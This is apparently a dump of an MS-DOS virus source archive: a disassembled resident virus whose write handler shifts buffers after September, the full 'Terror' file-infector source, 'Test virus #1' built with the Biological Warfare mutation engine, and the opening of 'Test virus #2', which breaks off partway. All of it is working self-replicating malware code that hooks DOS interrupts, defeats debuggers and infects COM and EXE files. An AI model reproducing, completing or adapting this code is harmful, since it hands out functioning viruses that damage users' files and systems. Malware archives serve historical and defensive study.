;----------------------------------------------------------------
l_16D5: cmp di,0 ;16D5 83 FF 00
jne l_16DD ;16D8 75 03
mov al,3 ;ignore ;16DA B0 03
iret ;16DC CF
l_16DD: jmp dword ptr cs:[362h] ;L_16E2 = old int 24h ;16DD 2E: FF 2E 0362
d_0362 dw 0556h,0DF0h ;16E2 56 05 F0 0D
;================================================================
; Get int 24h
;----------------------------------------------------------------
s_16E6 proc near
cli ; Disable interrupts ;16E6 FA
xor bx,bx ;16E7 33 DB
mov es,bx ;16E9 8E C3
mov bx,es:[90h] ;int 24h offset ;16EB 26: 8B 1E 0090
mov word ptr cs:[362h],bx ;l_16E2 ;16F0 2E: 89 1E 0362
mov bx,es:[92h] ;int 24h segment ;16F5 26: 8B 1E 0092
mov word ptr cs:[362h+2],bx ;L_16E2+2 ;16FA 2E: 89 1E 0364
mov word ptr es:[90h],355h ;offset l_16D5 ;16FF 26: C7 06 0090 0355
mov es:[92h],ax ;int 24h segment := CS ;1706 26: A3 0092
sti ;170A FB
retn ;170B C3
s_16E6 endp
;================================================================
; Restore int 24h vector
;----------------------------------------------------------------
s_170C proc near
cli ;170C FA
xor bx,bx ;170D 33 DB
mov es,bx ;170F 8E C3
mov bx,word ptr cs:[362h] ;1711 2E: 8B 1E 0362
mov es:[90h],bx ;1716 26: 89 1E 0090
mov bx,word ptr cs:[362h+2] ;171B 2E: 8B 1E 0364
mov es:[92h],bx ;1720 26: 89 1E 0092
sti ;1725 FB
retn ;1726 C3
s_170C endp
;===============================================================
; write handle service routine (destruction routine)
;---------------------------------------------------------------
s_1727 proc near
push ax ;1727 50
push bx ;1728 53
push cx ;1729 51
push dx ;172A 52
push es ;172B 06
push ds ;172C 1E
push si ;172D 56
push di ;172E 57
mov ax,es ;172F 8C C0
cmp ax,8 ;1731 3D 0008
je l_1750 ;-> virus contamination ;1734 74 1A
cmp bx,4 ;1736 83 FB 04
jb l_1750 ;-> BIOS ;1739 72 15
mov ah,2Ah ;get date, cx=year, dx=mon/day ;173B B4 2A
int 21h ;173D CD 21
cmp dh,9 ;september ? ;173F 80 FE 09
jb l_1750 ;-> bellow ;1742 72 0C
pop di ;1744 5F
pop si ;1745 5E
pop ds ;1746 1F
pop es ;1747 07
pop dx ;1748 5A
pop cx ;1749 59
pop bx ;174A 5B
pop ax ;174B 58
add dx,0Ah ;shift buffer address ;174C 83 C2 0A
retn ;174F C3
l_1750: pop di ;1750 5F
pop si ;1751 5E
pop ds ;1752 1F
pop es ;1753 07
pop dx ;1754 5A
pop cx ;1755 59
pop bx ;1756 5B
pop ax ;1757 58
retn ;1758 C3
s_1727 endp
db 16 dup (0) ;not used ;1759 0010[00]
;================================================================
; Load & Execute service routine
;----------------------------------------------------------------
s_1769 proc near
push ax ;1769 50
push bx ;176A 53
push cx ;176B 51
push dx ;176C 52
push es ;176D 06
push ds ;176E 1E
push si ;176F 56
push di ;1770 57
mov si,dx ;file pathname ;1771 8B F2
mov ax,cs ;1773 8C C8
mov es,ax ;1775 8E C0
mov di,offset ds:[57Fh] ;l_18FF - victim name ;1777.BF 057F
mov cx,19h ;177A B9 0019
rep movsb ;copy victim name ;177D F3/ A4
call s_16E6 ;Get int 24h vector ;177F E8 FF64
mov ds,ax ;ds:=cs ;1782 8E D8
call s_13FD ;1784 E8 FC76
call s_170C ;Restore int 24h vector ;1787 E8 FF82
pop di ;178A 5F
pop si ;178B 5E
pop ds ;178C 1F
pop es ;178D 07
pop dx ;178E 5A
pop cx ;178F 59
pop bx ;1790 5B
pop ax ;1791 58
retn ;1792 C3
s_1769 endp
;================================================================
; New int 21h service routine
;----------------------------------------------------------------
;<---- 10 bytes to identify resident virus
d_0413: pushf ;1793 9C
cmp ah,40h ;write handle ? ;1794 80 FC 40
jne l_179F ;-> no ;1797 75 06
call s_1727 ;write handle service routine ;1799 E8 FF8B
jmp short l_17A7 ;179C EB 09
nop ;179E 90
l_179F: cmp ah,4Bh ;Load & Execute ? ;179F 80 FC 4B
jne l_17A7 ;-> no ;17A2 75 03
call s_1769 ;Load & Execute service routine ;17A4 E8 FFC2
l_17A7: popf ;17A7 9D
;================================================================
; Execute substituted code and jump into old int 21h service
;----------------------------------------------------------------
;<- four bytes from int 21h service
d_0428: cmp ah,51h ;17A8 80 FC 51
d_042B: je l_17B2 ;17AB 74 05
jmp dword ptr cs:[547h] ;17AD 2E: FF 2E 0547
l_17B2: jmp dword ptr cs:[49Dh] ;17B2 2E: FF 2E 049D
d_0437 dw 0000h,02A0h ;dword = code length ;17B7 00 00 A0 02
;================================================================
; Make virus resident
;----------------------------------------------------------------
s_17BB proc near
cli ;disable interrupts ;17BB FA
push es ;17BC 06
lea si,cs:[413h] ;l_1793 ;17BD 8D 36 0413
mov di,si ;17C1 8B FE
mov cx,9800h ;resident virus segment ;17C3 B9 9800
mov es,cx ;17C6 8E C1
mov cx,0Ah ;17C8 B9 000A
repe cmpsb ;17CB F3/ A6
cmp cx,0 ;17CD 83 F9 00
pop es ;17D0 07
jz l_181A ;-> allready resident ;17D1 74 47
mov bx,es:[84h] ;int 21h - offset ;17D3 26: 8B 1E 0084
mov ax,es:[86h] ;int 21h - segment ;17D8 26: A1 0086
mov word ptr ds:[549h],ax ;l_18C9 ;17DC A3 0549
mov word ptr ds:[49Fh],ax ;l_181F ;17DF A3 049F
mov di,bx ;17E2 8B FB
mov es,ax ;17E4 8E C0
mov cx,80h ;17E6 B9 0080
mov al,80h ;17E9 B0 80
l_17EB: repne scasb ;find byte 80h ;17EB F2/ AE
cmp cx,0 ;17ED 83 F9 00
je l_1870 ;-> not found, EXIT ;17F0 74 7E
cmp byte ptr es:[di],0FCh ;17F2 26: 80 3D FC
jne l_17EB ;-> find another place ;17F6 75 F3
;<- get four bytes from int 21h service
mov al,es:[di+2] ;17F8 26: 8A 45 02
mov byte ptr cs:[42Bh],al ;l_17AB ;17FC 2E: A2 042B
mov al,es:[di-1] ;1800 26: 8A 45 FF
mov byte ptr cs:[428h],al ;l_17A8 ;1804 2E: A2 0428
mov al,es:[di] ;1808 26: 8A 05
mov byte ptr cs:[429h],al ;l_17A8+1 ;180B 2E: A2 0429
mov al,es:[di+1] ;180F 26: 8A 45 01
mov byte ptr cs:[42Ah],al ;l_17A8+2 ;1813 2E: A2 042A
jmp short l_1821 ;1817 EB 08
nop ;1819 90
;<- allready resident
l_181A: jmp short l_1870 ;-> EXIT ;181A EB 54
nop ;181C 90
d_049D dw 140Dh ;address to jump1 into ;181D 0D 14
d_049F dw 0278h ;old int 21h segment ;181F 78 02
l_1821: mov ax,di ;1821 8B C7
add ax,4 ;next to conditional jmp;1823 05 0004
xor bx,bx ;1826 33 DB
mov bl,es:[di+3] ;jump length ;1828 26: 8A 5D 03
add ax,bx ;jump address ;182C 03 C3
mov word ptr ds:[49Dh],ax ;l_181D ;182E A3 049D
cmp byte ptr es:[di+3],80h ;1831 26: 80 7D 03 80
jb l_183E ;-> forward jump ;1836 72 06
;<- jump backwards
sub ax,100h ;minus carry ;1838 2D 0100
mov word ptr ds:[49Dh],ax ;l_181D ;183B A3 049D
l_183E: add di,4 ;second condition addrs ;183E 83 C7 04
mov word ptr ds:[547h],di ;1841 89 3E 0547
sub di,5 ;<- area to substitute ;1845 83 EF 05
push es ;1848 06
push di ;1849 57
mov dx,9800h ;resident virus segment ;184A BA 9800
mov word ptr cs:[4F5h],dx ;184D 2E: 89 16 04F5
mov es,dx ;1852 8E C2
xor si,si ;1854 33 F6
xor di,di ;1856 33 FF
mov cx,612h ;l_1380 -> l_1992 ;1858 B9 0612
rep movsb ;copy virus code ;185B F3/ A4
;<----- take control over int 21h
lea cx,cs:[413h] ;offset l_1793 ;185D 8D 0E 0413
mov word ptr ds:[4F3h],cx ;1861 89 0E 04F3
pop di ;1865 5F
pop es ;1866 07
mov cx,5 ;1867 B9 0005
lea si,cs:[4F2h] ;offset l_1792 ;186A 8D 36 04F2
rep movsb ;186E F3/ A4
l_1870: sti ;1870 FB
retn ;1871 C3
s_17BB endp
;<---- instruction pattern to write over int 21h code
d_04F2 db 0EAh ;JMP FAR 9800:l_1793 ;1872 EA
d_04F3 dw 0 ;:= offset l_1793 ;1873 00 00
d_04F5 dw 9800h ;resident virus segment ;1875 00 98
;================================================
; saved 32 victim bytes
;------------------------------------------------
d_04F7 db 0E9h,0FFh,11h ;1877 E9 FF 11
db 'Converted',0,0,0,0 ;187A 43 6F 6E 76 65 72
;1880 74 65 64 00 00 00 00
db 'MZ' ;1887 4D 5A
db 0EAh,01h,09h,00h,08h,00h ;1889 EA 01 09 00 08 00
db 20h,00h,00h,00h,0FFh,0FFh ;188F 20 00 00 00 FF FF
db 98h,00h ;1895 98 00 00
;-----------------------------------
db 48 dup (0) ;not used ;1897 0030[00]
d_0547 dw 146Ch ;address to jump2 into ;18C7 6C 14
d_0549 dw 0278h ;old int 21h segment ;18C9 78 02
;<------ code writed to in case of paragraf alignement
db 0E9h ;jmp l_18CF ;18CB E9
d_054C dw 052Ch ;distance of jump ;18CC 2C 05
db 0 ;18CE 00
;================================================================
; EXE virus entry
;----------------------------------------------------------------
l_18CF: push bx ;18CF 53
push cx ;18D0 51
push es ;18D1 06
push ds ;18D2 1E
pushf ;18D3 9C
mov ax,cs ;18D4 8C C8
mov ds,ax ;18D6 8E D8
call s_1938 ;make virus resident ;18D8 E8 005D
cmp byte ptr ds:[349h],0FFh ;l_16C9 (0FFh=COM) ;18DB 80 3E 0349 FF
je l_18E5 ;18E0 74 03
jmp short l_1953 ;-> ? ;18E2 EB 6F
nop ;18E4 90
;================================================================
; End of virus code - file *.COM
;----------------------------------------------------------------
l_18E5: popf ;18E5 9D
pop ds ;18E6 1F
pop es ;18E7 07
pop cx ;18E8 59
pop bx ;18E9 5B
mov word ptr cs:[5B4h],100h ;l_1934 = victim IP ;18EA 2E: C7 06 05B4 0100
mov ax,es ;18F1 8C C0
mov word ptr cs:[5B6h],ax ;l_1936 = victim CS ;18F3 2E: A3 05B6
call s_16CA ;init registers ;18F7 E8 FDD0
jmp dword ptr cs:[5B4h] ;l_1934 -> run victim ;18FA 2E: FF 2E 05B4
;<--- victim name
d_057F db 'A:\SYS.COM' ;18FF 41 3A 5C 53 59 53
;1905 2E 43 4F 4D
db 0,'XE',0,'E',0 ;1909 00 58 45 00 45 00
db 9 dup (0) ;190F 0009[00]
;================================================================
; ANTYDEBUG - make virus resident
;----------------------------------------------------------------
s_1918 proc near
cmp ax,3000h ;1918 3D 3000
jne l_1925 ;-> int 3 ;191B 75 08
call s_17BB ;-> make virus resident ;191D E8 FE9B
retn ;1920 C3
s_1918 endp
d_05A1 dw 002Ah ;victim SS (rel) ;1921 2A 00
d_05A3 dw 1388h ;victim SP ;1923 88 13
;================================================================
; ANTYDEBUG - call int 3 (Breakpoint)
;----------------------------------------------------------------
s_1925 proc near
l_1925: mov ax,3000h ;Flag register ;1925 B8 3000
push ax ;1928 50
l_1929: call dword ptr es:[0Ch] ;int 3 (Breakpoint) ;1929 26: FF 1E 000C
cmp ax,3000h ;192E 3D 3000
jne l_1929 ;1931 75 F6
retn ;1933 C3
s_1925 endp
d_05B4 dw 0000h ;victim IP ;1934 00 00
d_05B6 dw 000Bh ;victim CS (rel) ;1936 0B 00
;================================================================
; Make virus resident
;----------------------------------------------------------------
s_1938 proc near
push es ;1938 06
call s_1948 ;-> INT 1 (single step) ;1939 E8 000C
cmp ax,0 ;193C 3D 0000
jne l_1947 ;193F 75 06
call s_1925 ;-> INT 3 (Breakpoint) ;1941 E8 FFE1
call s_1918 ;-> reside virus ;1944 E8 FFD1
l_1947: pop es ;1947 07
;================================================================
; ANTYDEBUG - call int 1 = Single Step
;----------------------------------------------------------------
s_1948: pushf ;1948 9C
xor ax,ax ;1949 33 C0
mov es,ax ;194B 8E C0
call dword ptr es:[4h] ;int 1 ;194D 26: FF 1E 0004
retn ;1952 C3
s_1938 endp
;================================================================
; End of virus code - file *.EXE
;----------------------------------------------------------------
l_1953: popf ;1953 9D
pop ds ;1954 1F
pop es ;1955 07
pop cx ;1956 59
pop bx ;1957 5B
mov ax,es ;1958 8C C0
add ax,10h ;relocating value ;195A 05 0010
mov dx,ax ;195D 8B D0
mov bp,word ptr cs:[5A1h] ;l_1921 = victim SS ;195F 2E: 8B 2E 05A1
add bp,ax ;1964 03 E8
mov ss,bp ;1966 8E D5
mov bp,word ptr cs:[5A3h] ;l_1923 = victim SP ;1968 2E: 8B 2E 05A3
mov sp,bp ;196D 8B E5
mov ax,dx ;196F 8B C2
add word ptr cs:[5B6h],ax ;l_1936 - CS relocation ;1971 2E: 01 06 05B6
call s_16CA ;init registers ;1976 E8 FD51
jmp dword ptr cs:[5B4h] ;-> run victim ;1979 2E: FF 2E 05B4
db 20 dup (0) ;COM file stack ;197E 0014[00]
d_0612 label byte ;1992h
seg_a ends
end start


1089
MSDOS/Virus.MSDOS.Unknown.tequila.asm Normal file
View File

File diff suppressed because it is too large Load Diff

492
MSDOS/Virus.MSDOS.Unknown.terror.asm Normal file
View File

@ -0,0 +1,492 @@
;**********************************************
; Terror Virus
;**********************************************
Code Segment
Assume CS:Code
Org 100h
Start: jmp short Begin
Table310 dw 12E4h,09ABh
Table320 dw 138Dh,17D0h
Table330 dw 1460h,0F7Ah
FileBytes dw 12 dup (9090h)
ComSpec db 'A:\COMMAND.COM',0
CheckEXE: cmp cs:FileBytes,4D5Ah
je IsEXE
cmp cs:FileBytes,5A4Dh
IsEXE: ret
Begin: mov word ptr cs:PSPSeg,ds
push ax
mov ax,0EC59h
int 21h
cmp bp,ax
jnz Install
push cs
pop ds
StartFile: pop ax
mov es,word ptr cs:PSPSeg
call CheckEXE
je ExeFileStart
mov cx,13
mov si,offset FileBytes
push es
mov di,100h
push di
rep movsb
push es
pop ds
retf
ExeFileStart: mov si,es
add si,10h
add cs:FileBytes [16h],si
add si,cs:FileBytes [0Eh]
mov di,cs:FileBytes [10h]
push es
pop ds
cli
mov ss,si
mov sp,di
sti
jmp dword ptr cs:FileBytes [14h]
Install: mov ah,30h
int 21h
mov bx,offset Table310
cmp ax,0A03h
jne Not310
mov ax,0070h
mov bx,0D43h
mov es,ax
cmp byte ptr es:[bx],2Eh ; CS prefix
jne SetVectors
mov ax,bx
jmp short SetV1
Not310: add bx,4
cmp ax,1403h
je SetVectors
add bx,4
cmp ax,1E03h
je SetVectors
mov ax,3513h
int 21h
mov word ptr cs:True13, bx
mov word ptr cs:True13 + 2,es
mov ax,3521h
mov dx,bx
jmp short Set21
SetVectors: mov ax,word ptr cs:[bx+2]
SetV1: mov dx,word ptr cs:[bx]
mov word ptr cs:True13,ax
mov word ptr cs:True13 + 2,0070h
mov ah,34h
int 21h
Set21: push es
pop ds
mov ax,25ECh
int 21h
mov ax,word ptr cs:PSPSeg
mov es,ax
dec ax
mov ds,ax
mov bx,word ptr ds:[3]
sub bx,101
add ax,bx
mov word ptr es:[0002h],ax ; Setup PSP memory size.
; Command.COM needs that
; action; else the system
; hangs.
mov ah,4Ah
int 0ECh
mov bx,100
mov ah,48h
int 0ECh
sub ax,10h
mov es,ax
mov byte ptr ds:[0000h],5Ah ; This is the last block,
; don't you think so?
push cs
pop ds
mov si,100h
mov di,si
mov cx,MovedSize
rep movsb
mov di,offset Continue
push es
push di
retf
Continue: mov word ptr es:[0F1h],0070h
mov ax,3521h
int 0ECh
mov word ptr cs:Saved21, bx
mov word ptr cs:Saved21 + 2,es
mov ah,25h
mov dx,offset Int21
push cs
pop ds
int 0ECh
push cs
pop es
mov di,offset Handles
mov cx,25
mov al,0
rep stosb
jmp StartFile
Respond: mov bp,ax
iret
Int21: cmp ax,0EC59h
je Respond
cmp ax,4B00h
je Exec
cmp ah,3Dh
je Open
cmp ah,3Eh
je Close
cmp ah,11h
jne End21
push di
mov di,dx
cmp byte ptr ds:[di+6],08 ; Volume ID attributes
je Find1st
EndF1st: pop di
End21: db 0EAh
Saved21 dd ?
Exec: call InfectName
jmp End21
OpenEnd: pop cx
jmp End21
Open: push cx
call GetAttr
jc OpenEnd
cmp cx,20h
pop cx
jne End21
mov al,2
pushf
call dword ptr cs:Saved21
jc Err21
push ax
push bx
mov bx,ax
mov al,byte ptr cs:Command?
mov byte ptr cs:Handles [bx],al
pop bx
pop ax
Err21: retf 2
Close: cmp byte ptr cs:Handles [bx],0
jz End21
push ax
mov al,byte ptr cs:Handles [bx]
mov byte ptr cs:Command?,al
mov byte ptr cs:Handles [bx],0
mov ah,45h
int 0ECh
mov word ptr cs:TempHandle,ax
pop ax
jc End21
pushf
call dword ptr cs:Saved21
jc Err21
push bx
mov bx,word ptr cs:TempHandle
push ds
call SetV
call InfectHandle
call Restore
pop ds
pop bx
clc
retf 2
Find1st: push ax
push dx
push ds
mov al,byte ptr ds:[di+7]
mov dx,offset Comspec
or al,al
jz CurrentDrive
add al,'A'-1
mov byte ptr cs:Comspec,al
jmp short Infect1st
CurrentDrive: add dx,2
Infect1st: push cs
pop ds
call InfectName
pop ds
pop dx
pop ax
jmp EndF1st
InfectName: push ax
push bx
push cx
call GetAttr
jc EndIN0
push cx
push ds
call SetV
pop ds
mov ax,4301h
xor cx,cx
int 0ECh
jc EndIN1
mov ax,3D02h
int 0ECh
mov bx,ax
EndIN1: pop cx
jc EndInfName
call InfectHandle
mov ax,4301h
int 0ECh
EndInfName: call Restore
EndIN0: pop cx
pop bx
pop ax
ret
SetV: push ax
push dx
push bx
push es
mov ax,3513h
int 0ECh
mov word ptr cs:Old13,bx
mov word ptr cs:Old13+2,es
mov al,24h
int 0ECh
mov word ptr cs:Old24,bx
mov word ptr cs:Old24+2,es
pop es
pop bx
push cs
pop ds
mov dx,offset Critical
mov ah,25h
int 0ECh
mov dx,offset Int13
mov al,13h
int 0ECh
pop dx
pop ax
ret
InfectHandle: push ax
push cx
push dx
push si
push di
push ds
mov di,offset FileBytes
mov cx,0FFFFh
mov dx,-6
mov ax,4202h
int 0ECh
mov ah,3Fh
mov cx,6
push cs
pop ds
mov dx,di
int 0ECh
jc EndH1
cmp word ptr cs:[di],'eT'
je EndH1
xor cx,cx
xor dx,dx
mov ax,4200h
int 0ECh
mov ah,3Fh
mov cx,24
mov dx,di
int 0ECh
jnc ReadOk
EndH1: jmp EndInfHandle
ReadOk: xor cx,cx
xor dx,dx
cmp byte ptr cs:Command?,2
jne Seek
cmp word ptr ds:[di+1],4000h ; Is there some
; another virus
; in the stack?
ja EndH1
dec cx
mov dx,-(VirusSize+64)
Seek: mov ax,4202h
Seek1: int 0ECh
test ax,000Fh
jz SeekOk
mov cx,dx
mov dx,ax
add dx,10h
and dl,0F0h
mov ax,4200h
jmp Seek1
SeekOk: call CheckEXE
je SkipEXE
or dx,dx
jnz EndH1
cmp ax,1024
jnb MayBeGood?
jmp EndInfHandle
MayBeGood?: cmp ax,64000
ja EndInfHandle
SkipEXE: mov cl,4
shr ax,cl
mov si,ax
mov cl,12
shl dx,cl
add si,dx
mov ah,40h
mov dx,100h
mov cx,VirusSize
int 0ECh
jc EndInfHandle
call CheckEXE
jne ComFile
sub si,10h
sub si,word ptr cs:[di+08h]
mov word ptr cs:[di+14h],100h
mov word ptr cs:[di+16h],si
mov word ptr cs:[di+10h],400h
add si,VirusSize / 16 + 1
mov word ptr cs:[di+0Eh],si
mov ax,4202h
xor cx,cx
xor dx,dx
int 0ECh
mov cx,200h
div cx
or dx,dx
jz DontAdjust
inc ax
DontAdjust: mov word ptr cs:[di+02h],dx
mov word ptr cs:[di+04h],ax
jmp short Common
ComFile: push si
push di
push es
push cs
pop es
mov si,offset ComHeader
mov cx,11
rep movsb
pop es
pop di
pop ds:[di+11]
Common: mov ax,4200h
xor cx,cx
xor dx,dx
int 0ECh
mov ah,40h
mov cx,24
mov dx,di
int 0ECh
EndInfHandle: mov ax,5700h
int 0ECh
mov al,1
int 0ECh
mov ah,3Eh
int 0ECh
pop ds
pop di
pop si
pop dx
pop cx
pop ax
ret
Restore: push ax
push dx
push ds
mov ax,2513h
mov dx,word ptr cs:Old13
mov ds,word ptr cs:Old13+2
int 0ECh
mov al,24h
mov dx,word ptr cs:Old24
mov ds,word ptr cs:Old24+2
pop ds
pop dx
pop ax
ret
GetAttr: push ax
push es
push di
push bx
mov di,dx
push ds
pop es
mov al,0
mov cx,64
repne scasb
mov ax,word ptr ds:[di-3]
mov cx,word ptr ds:[di-5]
and ax,5F5Fh ; Upcase extension
and ch,5Fh
cmp ax,'MO'
jne Exe?
cmp cx,'C.'
je CommandChk
ErrAttr: stc
jmp short EndAttr
Exe?: cmp ax,'EX'
jne ErrAttr
cmp cx,'E.'
jne ErrAttr
CommandChk: mov cx,7
mov bx,-1
Loop0: inc bx
mov al,byte ptr ds:[bx+di-12]
and al,5Fh
cmp al,byte ptr cs:Comspec [bx+3]
loope Loop0
mov al,1
jne NoCommand
mov al,2
NoCommand: mov byte ptr cs:Command?,al
mov ax,4300h
int 0ECh
EndAttr: pop bx
pop di
pop es
pop ax
ret
Critical: mov al,3
iret
Int13: cmp ah,3
jz Skip13
db 0EAh ; JMP Far
Old13 dd ?
Skip13: db 0EAh
True13 dd ?
ComHeader db 50h,8Ch,0C8h,01h,06h,0Bh,01h,58h,0EAh,00h,01h
Terror db ' Terror'
VirusEnd label byte
VirusSize = offset VirusEnd - offset Start
Old24 dd ?
TempHandle label word
PSPSeg dw ?
MovedSize = $ - offset Start
Handles db 25 dup (?)
Command? db ?
Code EndS
End Start

379
MSDOS/Virus.MSDOS.Unknown.test1.asm Normal file
View File

@ -0,0 +1,379 @@
; test1.asm : Test virus #1
; Created with Biological Warfare - Version 0.90á by MnemoniX
PING equ 0F43Fh
PONG equ 0B1DEh
STAMP equ 26
MARKER equ 07070h
code segment
org 0
assume cs:code,ds:code
start:
db 0E9h,3,0 ; to virus
host:
db 0CDh,20h,0 ; host program
virus_begin:
push ds es
call $ + 3 ; BP is instruction ptr.
pop bp
sub bp,offset $ - 1
xor ax,ax ; mild anti-trace code
mov es,ax ; kill interrupts 1 & 3
mov di,6
stosw
mov di,14
stosw
in al,21h ; lock out & reopen keyboard
xor al,2
out 21h,al
xor al,2
out 21h,al
mov ax,PING ; test for residency
int 21h
cmp bx,PONG
je installed
mov ax,es ; Get PSP
dec ax
mov ds,ax ; Get MCB
sub word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64
sub word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64
mov es,word ptr ds:[12h]
push cs ; copy virus into memory
pop ds
xor di,di
mov si,bp
mov cx,(virus_end - start) / 2 + 1
rep movsw
xor ax,ax ; capture interrupts
mov ds,ax
mov si,21h * 4 ; get original int 21
mov di,offset old_int_21
movsw
movsw
mov word ptr ds:[si - 4],offset new_int_21
mov ds:[si - 2],es ; and set new int 21
installed:
pop es ds ; restore segregs
cmp sp,MARKER ; check for .EXE
je exe_exit
com_exit:
mov si,[bp + mutator] ; restore host program
sub si,3
mov di,100h
push di
movsw
movsb
call fix_regs ; fix up registers
ret ; and leave
exe_exit:
mov ax,ds ; fix up return address
add ax,10h
push ax
add ax,cs:[bp + exe_cs]
mov cs:[bp + return_cs],ax
mov ax,cs:[bp + exe_ip]
mov cs:[bp + return_ip],ax
pop ax
add ax,cs:[bp + exe_ss] ; restore stack
cli
mov ss,ax
mov sp,cs:[bp + exe_sp]
call fix_regs ; fix up registers
sti
db 0EAh ; back to host program
return_ip dw 0
return_cs dw 0
exe_cs dw -16 ; orig CS:IP
exe_ip dw 103h
exe_sp dw -2 ; orig SS:SP
exe_ss dw -16
fix_regs:
xor ax,ax
cwd
xor bx,bx
mov si,100h
xor di,di
xor bp,bp
ret
; interrupt 21 handler
int_21:
pushf
call dword ptr cs:[old_int_21]
ret
new_int_21:
cmp ax,PING ; residency test
je ping_pong
cmp ah,3Dh ; file open
je file_open
cmp ax,4B00h ; execute program
je execute
int_21_exit:
db 0EAh ; never mind ...
old_int_21 dd 0
ping_pong:
mov bx,PONG
iret
file_open:
push ax cx di es
call get_extension
cmp [di],'OC' ; .COM file?
jne perhaps_exe ; perhaps .EXE then
cmp byte ptr [di + 2],'M'
jne not_prog
jmp a_program
perhaps_exe:
cmp [di],'XE' ; .EXE file?
jne not_prog
cmp byte ptr [di + 2],'E'
jne not_prog
a_program:
pop es di cx ax
jmp execute ; infect file
not_prog:
pop es di cx ax
jmp int_21_exit
execute:
push ax bx cx dx si di ds es
xor ax,ax ; critical error handler
mov es,ax ; routine - catch int 24
mov es:[24h * 4],offset int_24
mov es:[24h * 4 + 2],cs
mov ax,4300h ; change attributes
int 21h
push cx dx ds
xor cx,cx
call set_attributes
mov ax,3D02h ; open file
call int_21
jnc open_it
jmp cant_open
open_it:
xchg bx,ax
push cs ; CS = DS
pop ds
mov ax,5700h ; save file date/time
int 21h
push cx dx
and cl,31 ; check time stamp
cmp cl,STAMP
jnz its_ok
jmp dont_infect
its_ok:
mov ah,3Fh
mov cx,28
mov dx,offset read_buffer
int 21h
cmp word ptr read_buffer,'ZM' ; .EXE?
jne its_ok_2
jmp infect_exe
its_ok_2:
mov al,2 ; move to end of file
call move_file_ptr
cmp dx,65279 - (VIRUS_SIZE + 3)
ja dont_infect ; too big, don't infect
mov word ptr new_jump + 1,dx
add dx,103h
mov mutator,dx
push cs ; call Biological Warfare
pop es ; Mutation Engine
mov cx,VIRUS_SIZE
mov di,offset encrypt_buffer
mov si,offset virus_begin
call _bwme
push cx
mov cx,3
mov ah,40h
mov dx,offset read_buffer ; save original program head
int 21h
mov ah,40h ; write virus to file
pop cx
mov dx,offset encrypt_buffer
int 21h
xor al,al ; back to beginning of file
call move_file_ptr
mov dx,offset new_jump ; and write new jump
int 21h
fix_date_time:
pop dx cx
and cl,-32 ; add time stamp
or cl,STAMP
mov ax,5701h ; restore file date/time
int 21h
close:
pop ds dx cx ; restore attributes
call set_attributes
mov ah,3Eh ; close file
int 21h
cant_open:
pop es ds di si dx cx bx ax
jmp int_21_exit ; leave
set_attributes:
mov ax,4301h
int 21h
ret
dont_infect:
pop cx dx ; can't infect, skip
jmp close
move_file_ptr:
mov ah,42h ; move file pointer
cwd
xor cx,cx
int 21h
mov dx,ax ; set up registers
mov ah,40h
mov cx,3
ret
infect_exe:
cmp word ptr read_buffer[26],0
jne dont_infect ; overlay, don't infect
cmp word ptr read_buffer[16],MARKER
je dont_infect ; infected already
les ax,dword ptr read_buffer[20]
mov exe_cs,es ; CS
mov exe_ip,ax ; IP
les ax,dword ptr read_buffer[14]
mov exe_ss,ax ; SS
mov exe_sp,es ; SP
mov word ptr read_buffer[16],MARKER
mov ax,4202h ; to end of file
cwd
xor cx,cx
int 21h
push ax dx ; save file size
push bx
mov cl,12 ; calculate offsets for CS
shl dx,cl ; and IP
mov bx,ax
mov cl,4
shr bx,cl
add dx,bx
and ax,15
pop bx
sub dx,word ptr read_buffer[8]
mov word ptr read_buffer[22],dx
mov word ptr read_buffer[20],ax
add dx,100
mov word ptr read_buffer[14],dx
pop dx ax ; calculate prog size
add ax,VIRUS_SIZE + 3
adc dx,0
mov cx,512 ; in pages
div cx ; then save results
inc ax
mov word ptr read_buffer[2],dx
mov word ptr read_buffer[4],ax
mov dx,word ptr read_buffer[20]
mov cx,VIRUS_SIZE ; call BWME
mov di,offset encrypt_buffer
mov si,offset virus_begin
push cs
pop es
call _bwme
mov ah,40h
mov dx,offset encrypt_buffer
int 21h
mov ax,4200h ; back to beginning
cwd
xor cx,cx
int 21h
mov ah,40h ; and fix up header
mov cx,28
mov dx,offset read_buffer
int 21h
jmp fix_date_time ; done
courtesy_of db '[BW]',0
signature db 'Test virus #1',0
get_extension:
push ds ; find extension
pop es
mov di,dx
mov cx,64
mov al,'.'
repnz scasb
ret
include bwme.asm
int_24:
mov al,3 ; int 24 handler
iret
mutator dw 106h
new_jump db 0E9h,0,0
virus_end:
VIRUS_SIZE equ virus_end - virus_begin
read_buffer db 28 dup (?) ; read buffer
encrypt_buffer db VIRUS_SIZE dup (?) ; encryption buffer
end_heap:
MEM_SIZE equ end_heap - start
code ends
end start

303
MSDOS/Virus.MSDOS.Unknown.test2.asm Normal file
View File

@ -0,0 +1,303 @@
; test2.asm : Test virus #2
; Created with Biological Warfare - Version 0.90á by MnemoniX
PING equ 0A6CFh
INFECT equ 2
MARKER equ 08080h
code segment
org 100h
assume cs:code,ds:code
start:
db 0E9h,3,0 ; to virus
host:
db 0CDh,20h,0 ; host program
virus_begin:
push ds es
call $ + 3 ; BP is instruction ptr.
pop bp
sub bp,offset $ - 1
xor ax,ax ; mild anti-trace code
mov es,ax ; kill interrupts 1 & 3
mov di,6
stosw
mov di,14
stosw
in al,21h ; lock out & reopen keyboard
xor al,2
out 21h,al
xor al,2
out 21h,al
push cs
pop ds
lea dx,[bp + offset new_DTA]
mov ah,1Ah
int 21h
mov byte ptr [bp + infections],0
push [bp + exe_cs]
push [bp + exe_ip]
push [bp + exe_ss]
push [bp + exe_sp]
call traverse
call activate
pop [bp + exe_sp]
pop [bp + exe_ss]
pop [bp + exe_ip]
pop [bp + exe_cs]
pop es ds
mov dx,80h
mov ah,1Ah
int 21h
exe_exit:
mov ax,ds ; fix up return address
add ax,10h
push ax
add ax,cs:[bp + exe_cs]
mov cs:[bp + return_cs],ax
mov ax,cs:[bp + exe_ip]
mov cs:[bp + return_ip],ax
pop ax
add ax,cs:[bp + exe_ss] ; restore stack
cli
mov ss,ax
mov sp,cs:[bp + exe_sp]
call fix_regs ; fix up registers
sti
db 0EAh ; back to host program
return_ip dw 0
return_cs dw 0
exe_cs dw -16 ; orig CS:IP
exe_ip dw 103h
exe_sp dw -2 ; orig SS:SP
exe_ss dw -16
fix_regs:
xor ax,ax
cwd
xor bx,bx
mov si,100h
xor di,di
xor bp,bp
ret
traverse:
sub sp,64 ; allocate stack space
mov si,sp
